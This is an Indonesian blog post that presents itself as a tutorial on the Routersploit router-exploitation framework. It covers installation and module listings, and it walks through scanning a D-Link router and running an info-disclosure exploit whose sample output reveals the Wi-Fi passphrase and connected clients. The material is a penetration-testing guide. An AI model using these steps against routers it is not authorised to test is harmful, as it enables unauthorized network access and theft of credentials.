Routersploit Tools Hack Router Powerfull Support Linux dan Osx

November 17, 2016
Sebenaranya sudah lama ingin share tools ini, namun baru kali ini saya ingat tools ini dan ingin share kepada kalian pembaca setia artikel dunia peretas. 


Routersploit merupakan sebuah tools opensource (sumber terbuka) diciptakan oleh Marcin Bury, 0burner, dan Mariusz Kupidura yang di dekasikan untuk perangkat embedded.

Pada tools routersploit terdapat beberapa module yang digunakan untuk pengujian pentrasi antara lain:
  • eksploitasi - modul yang mengambil keuntungan dari kerentanan diidentifikasi
  • creds - modul dirancang untuk menguji terhadap layanan jaringan
  • scanner - modul yang memeriksa apakah target rentan terhadap eksploitasi
Routersploit support
  • ftp
  • ssh
  • telnet
  • http auth dasar
  • bentuk http auth
  • snmp
Installasi Routersploit
  • Installasi pada kali linux
 git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py 
  • Installasi pada ubuntu 16.04
sudo apt-get install python-dev python-pip libncurses5-dev git git clone https://github.com/reverse-shell/routersploit cd routersploit pip install -r requirements.txt ./rsf.py  
  • Installasi pada osx
 it clone https://github.com/reverse-shell/routersploit cd routersploit sudo easy_install pip sudo pip install -r requirements.txt ./rsf.py 
  • Update routersploit
 cd routersploit git pull 
  • Penggunaan
 ./rsf.py 

Exploitasi
  • Daftar module
  rsf > use exploits/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > use exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) > 
 

Scanner

Contoh scanner kerentanan exploitasi dlink router
  • Pilih module
  rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options
  • Opsi
 Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                
  • Pilih target
 rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'} 
  • Jalankan module
 rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure 

Telah diverifikasi bahwa target rentan untuk dwr_932_info_disclosure mengeksploitasi. Sekarang menggunakan modul yang tepat dan mengeksploitasi sasaran.

 rrsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

   Parameter                  Value                                                                                                 
   ---------                  -----                                                                                                 
   get_wps_enable             0                                                                                                     
   wifi_AP1_enable            1                                                                                                     
   get_client_list            9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0     
   wifi_AP1_ssid              dlink-DWR-932                                                                                         
   get_mac_address            c4:00:f5:00:ec:40                                                                                     
   wifi_AP1_security_mode     3208,8                                                                                                
   wifi_AP1_hidden            0                                                                                                     
   get_mac_filter_switch      0                                                                                                     
   wifi_AP1_passphrase        MyPaSsPhRaSe                                                                                          
   get_wps_mode               0

Sumber: Routersploit

Sekian dari saya apabila ada kesalahan dalam penulisan mohon maaf sebesar-besarnya selamat malam dan selamat mecoba Good Luck!!

Share this :

Author merupakan seorang yang tertarik dengan cyber security namun bukan security expert

Previous
Next Post »
0 Komentar

Penulisan markup di komentar
  • Silahkan tinggalkan komentar jangan memasang link aktif, iklan dan spam saya yakin kamu bukan pecundang.
  • Untuk menyisipkan kode gunakan <i rel="code"> kode yang akan disisipkan </i>
  • Untuk menyisipkan kode panjang gunakan <i rel="pre"> kode yang akan disisipkan </i>
  • Untuk menyisipkan quote gunakan <i rel="quote"> catatan anda </i>
  • Untuk menyisipkan gambar gunakan <i rel="image"> URL gambar </i>
  • Untuk menyisipkan video gunakan [iframe] URL embed video [/iframe]
  • Kemudian parse kode tersebut pada kotak di bawah ini
  • © 2016 Dunia Peretas✔